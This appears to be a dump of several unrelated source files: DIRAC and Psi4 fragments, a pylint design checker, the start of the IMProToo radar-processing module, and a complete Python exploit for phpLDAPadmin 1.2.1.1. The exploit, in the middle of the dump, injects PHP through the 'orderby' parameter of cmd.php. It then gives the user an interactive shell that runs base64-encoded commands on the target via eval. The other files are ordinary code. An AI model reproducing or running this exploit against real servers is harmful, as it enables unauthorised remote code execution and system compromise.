if cpuLimit or wallClockLimit:
# We have got a partial result from PBS, assume that we ran for too short time
if not cpuLimit:
consumed['CPULimit'] = wallClockLimit * 0.8
if not wallClockLimit:
consumed['WallClockLimit'] = cpuLimit / 0.8
if not cpu:
consumed['CPU'] = int( time.time() - self.startTime )
if not wallClock:
consumed['WallClock'] = int( time.time() - self.startTime )
self.log.debug( "TimeLeft counters restored:", str( consumed ) )
return S_OK( consumed )
else:
msg = 'Could not determine some parameters'
self.log.info( msg, ':\nThis is the stdout from the batch system call\n%s' % ( result['Value'] ) )
retVal = S_ERROR( msg )
retVal['Value'] = consumed
return retVal
# EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#
|
andresailer/DIRAC
|
Core/Utilities/TimeLeft/PBSTimeLeft.py
|
Python
|
gpl-3.0
| 5,069
|
[
"DIRAC"
] |
8358b44c587217198c9518e6f5a907f0b4af1cd2356ddd50521baab2cc30056e
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2019 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""
Module findif_response_utils
Defines functions that are shared between ccreponse drivers for
computing properties using an embarrassingly parallel finite differences
approach.
New drivers should be added to the registered_props dict in
db_helper.py
"""
from .db_helper import *
from .data_collection_helper import *
|
CDSherrill/psi4
|
psi4/driver/procrouting/findif_response_utils/__init__.py
|
Python
|
lgpl-3.0
| 1,235
|
[
"Psi4"
] |
a008fbef94b135de42b3bd8297ce102073a5e3940bbdb3760bd678e42585eb0d
|
# Copyright (c) 2003-2012 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""check for signs of poor design
see http://intranet.logilab.fr/jpl/view?rql=Any%20X%20where%20X%20eid%201243
FIXME: missing 13, 15, 16
"""
from logilab.astng import Function, If, InferenceError
from pylint.interfaces import IASTNGChecker
from pylint.checkers import BaseChecker
import re
# regexp for ignored argument name
IGNORED_ARGUMENT_NAMES = re.compile('_.*')
SPECIAL_METHODS = [('Context manager', set(('__enter__',
'__exit__',))),
('Container', set(('__len__',
'__getitem__',
'__setitem__',
'__delitem__',))),
('Callable', set(('__call__',))),
]
class SpecialMethodChecker(object):
"""A functor that checks for consistency of a set of special methods"""
def __init__(self, methods_found, on_error):
"""Stores the set of __x__ method names that were found in the
class and a callable that will be called with args to R0024 if
the check fails
"""
self.methods_found = methods_found
self.on_error = on_error
def __call__(self, methods_required, protocol):
"""Checks the set of method names given to __init__ against the set
required.
If they are all present, returns true.
If they are all absent, returns false.
If some are present, reports the error and returns false.
"""
required_methods_found = methods_required & self.methods_found
if required_methods_found == methods_required:
return True
if required_methods_found != set():
required_methods_missing = methods_required - self.methods_found
self.on_error((protocol,
', '.join(sorted(required_methods_found)),
', '.join(sorted(required_methods_missing))))
return False
def class_is_abstract(klass):
"""return true if the given class node should be considered as an abstract
class
"""
for attr in klass.values():
if isinstance(attr, Function):
if attr.is_abstract(pass_is_abstract=False):
return True
return False
MSGS = {
'R0901': ('Too many ancestors (%s/%s)',
'too-many-ancestors',
'Used when class has too many parent classes, try to reduce \
this to get a more simple (and so easier to use) class.'),
'R0902': ('Too many instance attributes (%s/%s)',
'too-many-instance-attributes',
'Used when class has too many instance attributes, try to reduce \
this to get a more simple (and so easier to use) class.'),
'R0903': ('Too few public methods (%s/%s)',
'too-few-public-methods',
'Used when class has too few public methods, so be sure it\'s \
really worth it.'),
'R0904': ('Too many public methods (%s/%s)',
'too-many-public-methods',
'Used when class has too many public methods, try to reduce \
this to get a more simple (and so easier to use) class.'),
'R0911': ('Too many return statements (%s/%s)',
'too-many-return-statements',
'Used when a function or method has too many return statement, \
making it hard to follow.'),
'R0912': ('Too many branches (%s/%s)',
'too-many-branches',
'Used when a function or method has too many branches, \
making it hard to follow.'),
'R0913': ('Too many arguments (%s/%s)',
'too-many-arguments',
'Used when a function or method takes too many arguments.'),
'R0914': ('Too many local variables (%s/%s)',
'too-many-locals',
'Used when a function or method has too many local variables.'),
'R0915': ('Too many statements (%s/%s)',
'too-many-statements',
'Used when a function or method has too many statements. You \
should then split it in smaller functions / methods.'),
'R0921': ('Abstract class not referenced',
'abstract-class-not-used',
'Used when an abstract class is not used as ancestor anywhere.'),
'R0922': ('Abstract class is only referenced %s times',
'abstract-class-little-used',
'Used when an abstract class is used less than X times as \
ancestor.'),
'R0923': ('Interface not implemented',
'interface-not-implemented',
'Used when an interface class is not implemented anywhere.'),
'R0924': ('Badly implemented %s, implements %s but not %s',
'incomplete-protocol',
'A class implements some of the special methods for a particular \
protocol, but not all of them')
}
class MisdesignChecker(BaseChecker):
"""checks for sign of poor/misdesign:
* number of methods, attributes, local variables...
* size, complexity of functions, methods
"""
__implements__ = (IASTNGChecker,)
# configuration section name
name = 'design'
# messages
msgs = MSGS
priority = -2
# configuration options
options = (('max-args',
{'default' : 5, 'type' : 'int', 'metavar' : '<int>',
'help': 'Maximum number of arguments for function / method'}
),
('ignored-argument-names',
{'default' : IGNORED_ARGUMENT_NAMES,
'type' :'regexp', 'metavar' : '<regexp>',
'help' : 'Argument names that match this expression will be '
'ignored. Default to name with leading underscore'}
),
('max-locals',
{'default' : 15, 'type' : 'int', 'metavar' : '<int>',
'help': 'Maximum number of locals for function / method body'}
),
('max-returns',
{'default' : 6, 'type' : 'int', 'metavar' : '<int>',
'help': 'Maximum number of return / yield for function / '
'method body'}
),
('max-branchs',
{'default' : 12, 'type' : 'int', 'metavar' : '<int>',
'help': 'Maximum number of branch for function / method body'}
),
('max-statements',
{'default' : 50, 'type' : 'int', 'metavar' : '<int>',
'help': 'Maximum number of statements in function / method '
'body'}
),
('max-parents',
{'default' : 7,
'type' : 'int',
'metavar' : '<num>',
'help' : 'Maximum number of parents for a class (see R0901).'}
),
('max-attributes',
{'default' : 7,
'type' : 'int',
'metavar' : '<num>',
'help' : 'Maximum number of attributes for a class \
(see R0902).'}
),
('min-public-methods',
{'default' : 2,
'type' : 'int',
'metavar' : '<num>',
'help' : 'Minimum number of public methods for a class \
(see R0903).'}
),
('max-public-methods',
{'default' : 20,
'type' : 'int',
'metavar' : '<num>',
'help' : 'Maximum number of public methods for a class \
(see R0904).'}
),
)
def __init__(self, linter=None):
BaseChecker.__init__(self, linter)
self.stats = None
self._returns = None
self._branchs = None
self._used_abstracts = None
self._used_ifaces = None
self._abstracts = None
self._ifaces = None
self._stmts = 0
def open(self):
"""initialize visit variables"""
self.stats = self.linter.add_stats()
self._returns = []
self._branchs = []
self._used_abstracts = {}
self._used_ifaces = {}
self._abstracts = []
self._ifaces = []
def close(self):
"""check that abstract/interface classes are used"""
for abstract in self._abstracts:
if not abstract in self._used_abstracts:
self.add_message('R0921', node=abstract)
elif self._used_abstracts[abstract] < 2:
self.add_message('R0922', node=abstract,
args=self._used_abstracts[abstract])
for iface in self._ifaces:
if not iface in self._used_ifaces:
self.add_message('R0923', node=iface)
def visit_class(self, node):
"""check size of inheritance hierarchy and number of instance attributes
"""
self._inc_branch()
# Is the total inheritance hierarchy is 7 or less?
nb_parents = len(list(node.ancestors()))
if nb_parents > self.config.max_parents:
self.add_message('R0901', node=node,
args=(nb_parents, self.config.max_parents))
# Does the class contain less than 20 attributes for
# non-GUI classes (40 for GUI)?
# FIXME detect gui classes
if len(node.instance_attrs) > self.config.max_attributes:
self.add_message('R0902', node=node,
args=(len(node.instance_attrs),
self.config.max_attributes))
# update abstract / interface classes structures
if class_is_abstract(node):
self._abstracts.append(node)
elif node.type == 'interface' and node.name != 'Interface':
self._ifaces.append(node)
for parent in node.ancestors(False):
if parent.name == 'Interface':
continue
self._used_ifaces[parent] = 1
try:
for iface in node.interfaces():
self._used_ifaces[iface] = 1
except InferenceError:
# XXX log ?
pass
for parent in node.ancestors():
try:
self._used_abstracts[parent] += 1
except KeyError:
self._used_abstracts[parent] = 1
def leave_class(self, node):
"""check number of public methods"""
nb_public_methods = 0
special_methods = set()
for method in node.methods():
if not method.name.startswith('_'):
nb_public_methods += 1
if method.name.startswith("__"):
special_methods.add(method.name)
# Does the class contain less than 20 public methods ?
if nb_public_methods > self.config.max_public_methods:
self.add_message('R0904', node=node,
args=(nb_public_methods,
self.config.max_public_methods))
# stop here for exception, metaclass and interface classes
if node.type != 'class':
return
# Does the class implement special methods consitently?
# If so, don't enforce minimum public methods.
check_special = SpecialMethodChecker(
special_methods, lambda args: self.add_message('R0924', node=node, args=args))
protocols = [check_special(pmethods, pname) for pname, pmethods in SPECIAL_METHODS]
if True in protocols:
return
# Does the class contain more than 5 public methods ?
if nb_public_methods < self.config.min_public_methods:
self.add_message('R0903', node=node,
args=(nb_public_methods,
self.config.min_public_methods))
def visit_function(self, node):
"""check function name, docstring, arguments, redefinition,
variable names, max locals
"""
self._inc_branch()
# init branch and returns counters
self._returns.append(0)
self._branchs.append(0)
# check number of arguments
args = node.args.args
if args is not None:
ignored_args_num = len(
[arg for arg in args
if self.config.ignored_argument_names.match(arg.name)])
argnum = len(args) - ignored_args_num
if argnum > self.config.max_args:
self.add_message('R0913', node=node,
args=(len(args), self.config.max_args))
else:
ignored_args_num = 0
# check number of local variables
locnum = len(node.locals) - ignored_args_num
if locnum > self.config.max_locals:
self.add_message('R0914', node=node,
args=(locnum, self.config.max_locals))
# init statements counter
self._stmts = 1
def leave_function(self, node):
"""most of the work is done here on close:
checks for max returns, branch, return in __init__
"""
returns = self._returns.pop()
if returns > self.config.max_returns:
self.add_message('R0911', node=node,
args=(returns, self.config.max_returns))
branchs = self._branchs.pop()
if branchs > self.config.max_branchs:
self.add_message('R0912', node=node,
args=(branchs, self.config.max_branchs))
# check number of statements
if self._stmts > self.config.max_statements:
self.add_message('R0915', node=node,
args=(self._stmts, self.config.max_statements))
def visit_return(self, _):
"""count number of returns"""
if not self._returns:
return # return outside function, reported by the base checker
self._returns[-1] += 1
def visit_default(self, node):
"""default visit method -> increments the statements counter if
necessary
"""
if node.is_statement:
self._stmts += 1
def visit_tryexcept(self, node):
"""increments the branchs counter"""
branchs = len(node.handlers)
if node.orelse:
branchs += 1
self._inc_branch(branchs)
self._stmts += branchs
def visit_tryfinally(self, _):
"""increments the branchs counter"""
self._inc_branch(2)
self._stmts += 2
def visit_if(self, node):
"""increments the branchs counter"""
branchs = 1
# don't double count If nodes coming from some 'elif'
if node.orelse and (len(node.orelse)>1 or
not isinstance(node.orelse[0], If)):
branchs += 1
self._inc_branch(branchs)
self._stmts += branchs
def visit_while(self, node):
"""increments the branchs counter"""
branchs = 1
if node.orelse:
branchs += 1
self._inc_branch(branchs)
visit_for = visit_while
def _inc_branch(self, branchsnum=1):
"""increments the branchs counter"""
branchs = self._branchs
for i in xrange(len(branchs)):
branchs[i] += branchsnum
# FIXME: make a nice report...
def register(linter):
"""required method to auto register this checker """
linter.register_checker(MisdesignChecker(linter))
|
hpfem/agros2d
|
resources/python/pylint/checkers/design_analysis.py
|
Python
|
gpl-2.0
| 16,303
|
[
"VisIt"
] |
1330aab6dfee76d076f73bda05e814c2974abff1526bd025b675013ba3e9bb6e
|
#!/usr/bin/python
import re
import sys
import httplib
import getpass
import base64
def get_session_id(host,path):
req = httplib.HTTPConnection(host)
# write header
req.putrequest("GET",path+"index.php")
req.putheader("Host",host)
req.putheader("Connection","close")
req.endheaders()
res = req.getresponse()
if not res.getheader('set-cookie').split(';')[0]:
return "[-] Session ID not found!"
return res.getheader('set-cookie').split(';')[0]
# Launch exploit
def exploit(host,path,cmd):
req = httplib.HTTPConnection(host)
# write header
req.putrequest("POST", path+"cmd.php")
req.putheader("Cookie", session)
req.putheader("Cmd", cmd)
req.putheader("Content-Length", str(len(payload)))
req.putheader("Content-Type", "application/x-www-form-urlencoded")
req.putheader("Connection","close")
req.endheaders()
req.send(payload)
res = req.getresponse()
data = res.read().split('\n')
result = []
for line in data:
if not re.search("<br />", line) and not re.search('<b>Warning</b>:', line):
line = line.replace("_code_","")
result.append(line)
result = '\n'.join(result)
return result
print '''
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|| ||
|| phpLDAPadmin <= 1.2.1.1 Remote PHP Code Injection Exploit ||
|| Original discovery/poc: EgiX <n0b0d13s[at]gmail-com> ||
|| Written by Krit Kadnok < c1ph3r@blackbuntu.com > ||
|| Affected versions....: from 1.2.0 to 1.2.1.1 ||
|| References: http://sourceforge.net/support/tracker.php?aid=3417184 ||
|| http://www.exploit-db.com/exploits/18021/ ||
|| Visit: www.blackbuntu.com ||
|| ||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
'''
if len(sys.argv) != 3:
print "Usage: python",sys.argv[0],"<host> <path>"
print "Example: python",sys.argv[0],"localhost /"
print "Example: python",sys.argv[0],"localhost /phpldapadmin/htdocs/"
sys.exit(1)
host = sys.argv[1]
path = sys.argv[2]
#phpcode = "foo));}}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;/*";
phpcode = "foo));}}error_reporting(0);print(_code_);eval(base64_decode($_SERVER[HTTP_CMD]));die;/*";
payload = "cmd=query_engine&query=none&search=1&orderby=%s" % phpcode;
session = get_session_id(host,path)
while 1:
cmd = raw_input("\n%s@%s~$ " % (getpass.getuser(),host))
if cmd != "exit":
cmd = base64.b64encode(cmd)
data = exploit(host,path,cmd)
print data
else:
sys.exit(1)
|
c1ph3r/VA-Scripts
|
phpldapadmin-rce.py
|
Python
|
gpl-2.0
| 2,887
|
[
"VisIt"
] |
db884ed7c623e8395cfeee8856cec63ab6bb0ce6dde646bea7c7cf699043c911
|
# -*- coding: utf-8 -*-
'''
IMProToo
Improved MRR Processing Tool
Python toolkit to read, write and process MRR Data. Raw Data, Average and
Instantaneous Data are supported.
Copyright (C) 2011-2021 Maximilian Maahn, U Leipzig
maximilian.maahn_AT_uni-leipzig.de
https://github.com/maahn/IMProToo
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from __future__ import division
from __future__ import print_function
import numpy as np
import gzip
import re
import datetime
import calendar
import time
import glob
from copy import deepcopy
import warnings
import sys
import os
import codecs
from .tools import unix2date, date2unix, limitMaInidces, quantile
from .tools import oneD2twoD, _get_netCDF_module
try:
from importlib.metadata import version, PackageNotFoundError
py3 = True
except ImportError:
from pkg_resources import get_distribution, DistributionNotFound
py3 = False
if py3:
try:
__version__ = version("IMProToo")
except PackageNotFoundError:
# package is not installed
pass
else:
try:
__version__ = get_distribution("IMProToo").version
except DistributionNotFound:
# package is not installed
pass
class MrrZe:
'''
class to calculate the 'real' MRR Ze from MRR raw data. The spectra are
noise corrected and dealiased. see batch_convert_rawData.py for
exemplary use
'''
warnings.filterwarnings('always', '.*', UserWarning,)
def __init__(self, rawData):
if rawData.mrrRawCC == 0:
print('WARNING: MRR calibration constant set to 0!')
self.co = dict()
# verbosity
self.co["debug"] = 0
# ######MRR Settings#######
# mrr frequency, MRR after 2011 (or upgraded) use 24.23e9
self.co["mrrFrequency"] = 24.15e9 # in Hz,
# wavelength in m
self.co["lamb"] = 299792458. / self.co["mrrFrequency"]
# mrr calibration constant
self.co["mrrCalibConst"] = rawData.mrrRawCC
# do not change these values, unless you have a non standard MRR!
# nyquist range minimum
self.co["nyqVmin"] = 0
# nyquist range maximum
self.co["nyqVmax"] = 11.9301147
# nyquist delta
self.co["nyqVdelta"] = 0.1893669
# list with nyquist velocities
self.co["nyqVel"] = np.arange(
self.co["nyqVmin"],
self.co["nyqVmax"]+0.0001,
self.co["nyqVdelta"]
)
# spectral resolution
self.co["widthSpectrum"] = 64
# min height to be processed
self.co["minH"] = 1 # start counting at 0
# max height to be processed
self.co["maxH"] = 31 # start counting at 0
# no of processed heights
self.co["noH"] = self.co["maxH"]+1 - self.co["minH"]
# shape of spectrum for one time step
self.co["specShape"] = (self.co["noH"], self.co["widthSpectrum"],)
# input data MRR averaging time
self.co["averagingTime"] = 10
# |K**2| dielectric constant
self.co["K2"] = 0.92
# ######options for finding peaks#######
# minimum width of a peak. if set to 4 instead of 3, more clutter is
# removed, but sensitivity becomes worse.
self.co["findPeak_minPeakWidth"] = 3
# minimum standard deviation of of spectrum for peak
# self.co["findPeak_minStdPerS"]/np.sqrt(self.co["averagingTime"])
self.co["findPeak_minStdPerS"] = 0.6
# minimum difference of Doppler velocity from self.co["nyqVmax"]/2 for
# peak
self.co["findPeak_minWdiff"] = 0.2
# ######options for getting peaks#######
# method for finding peaks in the spectrum, either based on Hildebrand
# and Sekhon, 1974 [hilde] or on the method of descending average
# [descAve]. [hilde] is recommended
self.co["getPeak_method"] = "hilde" # ["hilde","descAve"]
# sometimes the first method fails and almost the whole spectrum is
# found as a peak, so apply a second check based on the remaining
# method from [hilde,descAve]
self.co["getPeak_makeDoubleCheck"] = True
# apply double check to peaks wider than xx*noOfSpec
# wider real peaks can actually happen! These are usually bimodal
# peaks, descending average method fails for them, thus the spectrum
self.co["getPeak_makeDoubleCheck_minPeakWidth"] = 0.9
# hilde method uses an extra buffer to avoid to large peaks. loop stops
# first at spectrum >= self.co["getPeak_hildeExtraLimit"]*hilde_limit,
# only one more bin is added if above self.co[
# "getPeak_hildeExtraLimit"]. More bins above self.co[
# "getPeak_hildeExtraLimit"] are ignored
self.co["getPeak_hildeExtraLimit"] = 1.2 # times hildebrand limit
# options for descAve method
# window to calculate the average, if too large, it might go into the
# next peak! if too small, it might not catch bimodal distributions
self.co["getPeak_descAveCheckWidth"] = 10
# descAve stops not before mean is smaller than self.co[
# "getPeak_descAveMinMeanWeight"] of the mean of the self.co[
# "getPeak_descAveCheckWidth"] smallest bins. make very big to turn off
self.co["getPeak_descAveMinMeanWeight"] = 4
# ####options for confirming peaks ##########
# check whether time/height neighbors of a peak contain a peak as well
self.co["confirmPeak_5x5boxCoherenceTest"] = True
# maximum of other peaks must be within X Doppler-bins of the maximum
# of the tested peak
self.co["confirmPeak_5x5boxCoherenceTest_maxBinDistane"] = 10
# ######general options#######
# process only peaks in self.co["spectrumBorderMin"][height]:
# self.co["spectrumBorderMax"][height]
self.co["spectrumBorderMin"] = [5, 4, 3, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 5]
self.co["spectrumBorderMax"] = [60, 61, 62, 63, 63, 63, 63, 63, 63,
63, 63, 63, 63, 63, 63, 63, 63, 63,
63, 63, 63, 63, 63, 63, 63, 63, 63,
63, 62, 61, 63]
# interpolate spectrum in between
self.co["interpolateSpectrum"] = True
# extend also peaks to interpolated part
self.co["fillInterpolatedPeakGaps"] = True
# mask everything in these heights, since they are disturbed
self.co["completelyMaskedHeights"] = [0, 1, 30]
# first height with trustful peaks. Setting important for dealiasing
# to avoid folding from completelyMaskedHeights into the first used#
# height.
self.co["firstUsedHeight"] = 2
# ######dealiasing options#######
# dealiase spectrum yes/no
self.co["dealiaseSpectrum"] = True
# save also non dealiased eta, Ze, W, Znoise specWidth,
# peakVelLeftBorder, peakVelRightBorder
self.co["dealiaseSpectrum_saveAlsoNonDealiased"] = True
# make sure there is only one peak per height after dealiasing!
self.co["dealiaseSpectrum_maxOnePeakPerHeight"] = True
# dealiasing is based on comparison with reference velocity calculated
# from reflectivity. v = A*Ze**B
# Atlas et al. 1973
self.co['dealiaseSpectrum_Ze-vRelationSnowA'] = 0.817
# Atlas et al. 1973
self.co['dealiaseSpectrum_Ze-vRelationSnowB'] = 0.063
# Atlas et al. 1973
self.co['dealiaseSpectrum_Ze-vRelationRainA'] = 2.6
# Atlas et al. 1973
self.co['dealiaseSpectrum_Ze-vRelationRainB'] = 0.107
# trusted peak needs minimal Ze
self.co['dealiaseSpectrum_trustedPeakminZeQuantile'] = 0.1
# if you have interference, you don't want to start you dealiasing
# procedure there
self.co["dealiaseSpectrum_heightsWithInterference"] = []
# test coherence of dealiasesd velocity spectrum in time dimension.
# try to refold short jumps.
self.co["dealiaseSpectrum_makeCoherenceTest"] = True
# if the height averaged velocity between to timesteps is larger than
# this, it is tried to refold the spectrum
self.co["dealiaseSpectrum_makeCoherenceTest_velocityThreshold"] = 8
# if there are after coherence test still velocity jumps, mask
# +/- timesteps
self.co["dealiaseSpectrum_makeCoherenceTest_maskRadius"] = 10
# ######netCDF options#######
self.co["ncCreator"] = "IMProToo user"
self.co["ncDescription"] = "MRR data processed with IMProToo"
self.co["ncLocation"] = ""
self.co["ncInstitution"] = ""
# ######end of settings#######
# special option to top processing in the middel and return results
self.debugStopper = 0
self.missingNumber = -9999.
self.header = rawData.header
self.time = rawData.mrrRawTime
self.timezone = rawData.timezone
self.H = rawData.mrrRawHeight[:, self.co["minH"]:self.co["maxH"]+1]
self.TF = rawData.mrrRawTF[:, self.co["minH"]:self.co["maxH"]+1]
self.rawSpectrum = rawData.mrrRawSpectrum[
:, self.co["minH"]:self.co["maxH"]+1
]
self.noSpecPerTimestep = rawData.mrrRawNoSpec
self.no_h = np.shape(self.H)[1]
self.no_t = np.shape(self.time)[0]
self.no_v = self.co["widthSpectrum"]
self._shape2D = np.shape(self.H)
self._shape3D = np.shape(self.rawSpectrum)
self.qual = dict()
return
def averageSpectra(self, averagingTime):
"""
average spectra and other data. If averaging time is e.g. 60, the
data with the timestamp 14:00 contains all measurements from 13:59:00
to 13:59:59 (like MRR standard software)
"""
rawSpectra = self.rawSpectrum
rawTimestamps = self.time
heights = self.H
TFs = self.TF
noSpec = self.noSpecPerTimestep
# find first entry
startSeconds = unix2date(rawTimestamps[0]).second
start = rawTimestamps[0] + averagingTime - startSeconds
# find last minute
endSeconds = unix2date(rawTimestamps[-1]).second
end = rawTimestamps[-1] + 60 - endSeconds
# make new time vector and
rawTimestampsAve = np.ma.arange(
start, end+averagingTime, averagingTime, dtype="int")
# create new arrays
newSpectraShape = list(rawSpectra.shape)
newSpectraShape[0] = rawTimestampsAve.shape[0]
rawSpectraAve = np.ma.zeros(newSpectraShape) * np.nan
newTFsShape = list(TFs.shape)
newTFsShape[0] = rawTimestampsAve.shape[0]
TFsAve = np.ma.zeros(newTFsShape) * np.nan
newHeightsShape = list(heights.shape)
newHeightsShape[0] = rawTimestampsAve.shape[0]
heightsAve = np.ma.zeros(newHeightsShape) * np.nan
newNoSpecShape = (rawTimestampsAve.shape[0],)
noSpecAve = np.ma.zeros(newNoSpecShape, dtype=int)
# ugly loop trough new, averaged time vector!
for t, timestamp in enumerate(rawTimestampsAve):
# boolean array containing the wanted entries
booleanTimes = (rawTimestamps < timestamp) * \
(rawTimestamps >= timestamp-averagingTime)
aveLength = np.sum(booleanTimes)
# proceed only if entries were found
if aveLength != 0:
# and if TF and heights are NOT changing and if heights are
# not zero!!
if (
np.all(TFs[booleanTimes] == TFs[booleanTimes][0]) and
np.all(heights[booleanTimes] == heights[booleanTimes][0])
and np.logical_not(np.all(heights[booleanTimes] == 0))
):
# averaging:
rawSpectraAve[t] = np.ma.average(
rawSpectra[booleanTimes], axis=0)
heightsAve[t] = np.ma.average(
heights[booleanTimes], axis=0)
TFsAve[t] = np.ma.average(TFs[booleanTimes], axis=0)
noSpecAve[t] = np.ma.sum(noSpec[booleanTimes])
else:
print("Skipping data due to changed MRR configuration!")
else:
rawSpectraAve[t] = np.nan
heightsAve[t] = np.nan
TFsAve[t] = np.nan
noSpecAve[t] = 0
print("No Data at " + str(unix2date(timestamp)))
self.rawSpectrum = rawSpectraAve
self.time = rawTimestampsAve
self.H = heightsAve
self.TF = TFsAve
self.noSpecPerTimestep = noSpecAve.filled(0)
self.no_t = np.shape(self.time)[0]
self._shape2D = np.shape(self.H)
self._shape3D = np.shape(self.rawSpectrum)
self.co["averagingTime"] = averagingTime
return
def getSub(self, start, stop):
"""
cut out some spectra (for debugging)
start,stop (int): border indices
"""
if stop == -1:
stop = self._shape2D[0]
self.rawSpectrum = self.rawSpectrum[start:stop]
self.time = self.time[start:stop]
self.H = self.H[start:stop]
self.TF = self.TF[start:stop]
self.noSpecPerTimestep = self.noSpecPerTimestep[start:stop]
if len(self.noSpecPerTimestep) == 0:
raise ValueError('getSub: No data lef!')
self.no_t = np.shape(self.time)[0]
self._shape2D = np.shape(self.H)
self._shape3D = np.shape(self.rawSpectrum)
return
def rawToSnow(self):
'''
core function for calculating Ze and other moments. Settings have
to be set before
'''
if self.co["mrrCalibConst"] == 0:
raise IOError('ERROR: MRR calibration constant set to 0!')
self.untouchedRawSpectrum = deepcopy(self.rawSpectrum)
self.specVel = self.co["nyqVel"]
self.specVel3D = np.zeros(self._shape3D)
self.specVel3D[:] = self.specVel
self.specIndex = np.arange(self.no_v)
self._specBorderMask = np.ones(self.co["specShape"], dtype=bool)
for h in range(self.co["noH"]):
self._specBorderMask[h, self.co["spectrumBorderMin"]
[h]:self.co["spectrumBorderMax"][h]] = False
self._specBorderMask3D = np.ones(self._shape3D, dtype=bool)
self._specBorderMask3D[:] = self._specBorderMask
# but we have to apply the TF before we start anything:
TF3D = np.zeros(self._shape3D)
TF3D.T[:] = self.TF.T
self.rawSpectrum = np.ma.masked_array(
self.rawSpectrum.data / TF3D, self.rawSpectrum.mask)
# 1)missing spectra
missingMask = np.any(np.isnan(self.rawSpectrum.data), axis=-1)
self.qual["incompleteSpectrum"] = missingMask
# 2) Wdiff
WdiffMask, self.wdiffs = self._testMeanW(self.rawSpectrum)
# 3) std
stdMask, self.stds = self._testStd(self.rawSpectrum)
# join the results
noiseMask = missingMask+(stdMask*WdiffMask)
self.qual["spectrumVarianceTooLowForPeak"] = stdMask * \
WdiffMask # 2) no signal detected by variance test
# make 3D noise Mask
noiseMaskLarge = np.zeros(self._shape3D, dtype=bool).T
noiseMaskLarge[:] = noiseMask.T
noiseMaskLarge = noiseMaskLarge.T
# we don't need the mask right now since missingMask contains all
# mask entries
self.rawSpectrum = self.rawSpectrum.data
if self.debugStopper == 1:
self.rawSpectrum = np.ma.masked_array(
self.rawSpectrum, noiseMaskLarge)
return
# find the peak
peakMask = np.ones(self._shape3D, dtype=bool)
self.qual["usedSecondPeakAlgorithmDueToWidePeak"] = np.zeros(
self._shape2D, dtype=bool)
self.qual["peakTooThinn"] = np.zeros(self._shape2D, dtype=bool)
for h in range(0, self.co["noH"]):
# check whether there is anything to do
if np.any(np.logical_not(noiseMaskLarge[:, h])):
# get the peak
specMins = self.co["spectrumBorderMin"][h]
specMaxs = self.co["spectrumBorderMax"][h]
res = self._getPeak(
self.rawSpectrum[:, h, specMins:specMaxs][
~noiseMask[:, h]],
self.noSpecPerTimestep[~noiseMask[:, h]],
h
)
(
peakMask[:, h, specMins:specMaxs][~noiseMask[:, h]],
self.qual["peakTooThinn"][:, h][~noiseMask[:, h]],
self.qual["usedSecondPeakAlgorithmDueToWidePeak"][:, h][
~noiseMask[:, h]]
) = res
# apply results
self.rawSpectrum = np.ma.masked_array(self.rawSpectrum, peakMask)
# what is the noise, but _without_ the borders, we want in noise 3D
# also
noise = np.ma.masked_array(self.rawSpectrum.data, (np.logical_not(
self.rawSpectrum.mask)+self._specBorderMask3D))
self.specNoise = np.ma.average(noise, axis=-1).filled(0)
if self.debugStopper == 2:
return
if self.co["confirmPeak_5x5boxCoherenceTest"]:
coherCheckNoiseMask = self._cleanUpNoiseMask(self.rawSpectrum)
coherCheckNoiseMask3D = np.zeros(self._shape3D, dtype=bool)
coherCheckNoiseMask3D.T[:] = coherCheckNoiseMask.T
else:
coherCheckNoiseMask = np.zeros(self._shape2D, dtype=bool)
coherCheckNoiseMask3D = np.zeros(self._shape3D, dtype=bool)
self.qual["peakRemovedByCoherenceTest"] = coherCheckNoiseMask * \
(~np.all(self.rawSpectrum.mask, axis=-1))
self.rawSpectrum.mask = self.rawSpectrum.mask + coherCheckNoiseMask3D
if self.debugStopper == 3:
return
# since we have removed more noisy spectra we have to calculate the
# noise again
noise = np.ma.masked_array(self.rawSpectrum.data, (np.logical_not(
self.rawSpectrum.mask)+self._specBorderMask3D))
self.specNoise = np.ma.average(noise, axis=-1).filled(0)
self.specNoise_std = np.ma.std(noise, axis=-1).filled(0)
self.specNoise3D = np.zeros_like(noise).filled(0)
self.specNoise3D.T[:] = self.specNoise.T
# remove the noise
self.rawSpectrum = np.ma.masked_array(
self.rawSpectrum.data - self.specNoise3D, self.rawSpectrum.mask)
if self.co["interpolateSpectrum"]:
# interpolate spectrum
